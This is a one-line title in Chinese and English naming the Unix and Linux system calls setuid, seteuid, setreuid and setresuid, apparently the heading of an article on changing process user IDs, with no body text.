linux/unix下setuid/seteuid/setreuid/setresuid